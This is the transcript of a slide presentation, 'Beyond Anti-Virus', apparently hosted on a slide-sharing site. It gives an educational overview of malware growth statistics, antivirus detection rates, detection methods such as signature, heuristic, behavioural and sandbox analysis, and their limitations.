Presentation is loading. Please wait.

Presentation is loading. Please wait.

Beyond Anti-Virus by Dan Keller 1987- Fred Cohen- Computer Scientist “there is no algorithm that can perfectly detect all possible computer viruses”

Published byCarmella Sanders Modified over 8 years ago

Similar presentations

Presentation on theme: "Beyond Anti-Virus by Dan Keller 1987- Fred Cohen- Computer Scientist “there is no algorithm that can perfectly detect all possible computer viruses”"— Presentation transcript:

1 Beyond Anti-Virus by Dan Keller 1987- Fred Cohen- Computer Scientist “there is no algorithm that can perfectly detect all possible computer viruses”

2 What is Anti-Virus (AV) Software? Anti-virus software is used to prevent, detect, and remove malicious software Some examples of malicious software detected by modern AV: BHO’s (Browser Helper Objects) Browser hijackers Ransomware Keyloggers Backdoors Rootkits Trojan Horses Worms Adware Spyware

3 Statistics AV-TEST- The Independent IT-Security Institute 1994 - 28,613 unique malware samples in their database 1999 - 98,428 2005 - 333,425 2007 - 5,490,960 new unique malware samples only for that year! 2015 – approx. 144,000,000 new malware variants

4 Lastline Labs Study (May ‘13- May ’14) Hundreds of thousands of malware samples VS. 47 AV vendors Results… Day 0 – only 51% of AV scanners detected new malware samples 2 weeks – Detection rates bumped up to 61% 1 Year – 10% of AV scanners still did not detect some malware The 1- percentile of malware least likely to be detected was undetected by the majority of AV scanners for months, and in some cases…never detected ___________________________________________________________ **Its estimated that AV only catches around 45% of cyber attacks (Semantec VP- Brian Dye). He said antivirus “is dead” (May 2014).

5 Now that you’re depressed…where do we go from here? Anti-Virus methods of detection Signature-based detection: When identifying viruses and other malware, the antivirus engine compares the contents of a file to its database of known malware signatures. Heuristic-based detection: This is generally used together with signature-based detection. It detects malware based on characteristics typically used in known malware code Behavioural-based detection: Instead of characteristics hardcoded in the malware code itself, it is based on the behavioral fingerprint of the malware at run-time. This technique is able to detect malware only after they have starting doing their malicious actions.

6 …Cont’d Sandbox detection: It’s a behavioral-based detection technique and instead of detecting the behavioral fingerprint at run time, it executes the programs in a virtual environment, logging what actions the program performs. Depending on the actions logged, the antivirus engine can determine if the program is malicious. If not, the program is executed in the real environment. This technique has shown to be very effective, but given its heaviness and slowness, it is rarely used in end-user antivirus solutions.

7 …Cont’d Data mining techniques: The latest approach applied in malware detection. Data mining and machine learning algorithms are used to try to classify the behavior of a file as either malicious or benign, given a series of file features, that are extracted from the file itself

8 Other approaches Unified Threat Management- Firewalls, gateway AV, content filtering, load balancing, data leak prevention all rolled up into one system Push your info to the cloud and let them deal with it Go back to paper Go off grid and live in the mountains

9 Drawbacks Lots of False positives creating ‘the boy who cried wolf.’ Also the false positives can end up deleting or paralyzing existing files that are clean Some more advances systems (Sandboxing) can slow down performance Tough to get out of contracts with existing vendors

10 Conclusion Anti-virus is not dead. Its just a standard from which we build upon. Anti-virus software is now being bundled up with other security software to form a more comprehensive system. And it’s essentially getting outsourced to other companies to help monitor your system is real-time.

Download ppt "Beyond Anti-Virus by Dan Keller 1987- Fred Cohen- Computer Scientist “there is no algorithm that can perfectly detect all possible computer viruses”"

Similar presentations

Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Day 4-1-1 anti-virus 3-3-1.anti-virus 1 detecting a malicious file malware, detection, hiding, removing.

Day anti-virus anti-virus 1 detecting a malicious file malware, detection, hiding, removing.
Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.

Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.
1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.

1 Anti Virus vs virus System i-Specific Anti-Virus Product Ali ameen al said.
Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.

Malicious Attacks. Introduction Commonly referred to as: malicious software/ “malware”, computer viruses Designed to enter computers without the owner’s.
LittleOrange Internet Security an Endpoint Security Appliance.

LittleOrange Internet Security an Endpoint Security Appliance.
Computer Security Fundamentals by Chuck Easttom Chapter 5 Malware.

Computer Security Fundamentals by Chuck Easttom Chapter 5 Malware.
Course 201 – Administration, Content Inspection and SSL VPN

Course 201 – Administration, Content Inspection and SSL VPN
Internet Safety for Students Malicious Programs By: Mr. Bradshaw Scott City R-1 Schools.

Internet Safety for Students Malicious Programs By: Mr. Bradshaw Scott City R-1 Schools.
Project By Ben Woodard ISC 110 Professor: Dr. Elaine Wenderholm.

Project By Ben Woodard ISC 110 Professor: Dr. Elaine Wenderholm.
GROUP MEMBERS ALI RAZA EHTASHAM ZAFAR SOHAIB AHMED BILAL HASSAN FAHAD ABDUL AZIZ.

GROUP MEMBERS ALI RAZA EHTASHAM ZAFAR SOHAIB AHMED BILAL HASSAN FAHAD ABDUL AZIZ.
Antivirus Software Detects malware (not just viruses) May eliminate malware as well Often sold with firewalls Two approaches: Dictionary-based - Compares.

Antivirus Software Detects malware (not just viruses) May eliminate malware as well Often sold with firewalls Two approaches: Dictionary-based - Compares.
R. FRANK NIMS MIDDLE SCHOOL A BRIEF INTRODUCTION TO VIRUSES.

R. FRANK NIMS MIDDLE SCHOOL A BRIEF INTRODUCTION TO VIRUSES.
Automated malware classification based on network behavior

Automated malware classification based on network behavior
CISC 879 - Machine Learning for Solving Systems Problems Presented by: Akanksha Kaul Dept of Computer & Information Sciences University of Delaware SBMDS:

CISC Machine Learning for Solving Systems Problems Presented by: Akanksha Kaul Dept of Computer & Information Sciences University of Delaware SBMDS:
IT-security in the Ubiquitous Computing World Chris Kuo, CISSP, CISA Acer eDC (e-Enabling Data Center) Acer Inc. 2007/3/27.

IT-security in the Ubiquitous Computing World Chris Kuo, CISSP, CISA Acer eDC (e-Enabling Data Center) Acer Inc. 2007/3/27.
Viruses.

Viruses.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)

Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
Computer Viruses Preetha Annamalai Niranjan Potnis.

Computer Viruses Preetha Annamalai Niranjan Potnis.

Similar presentations

Ads by Google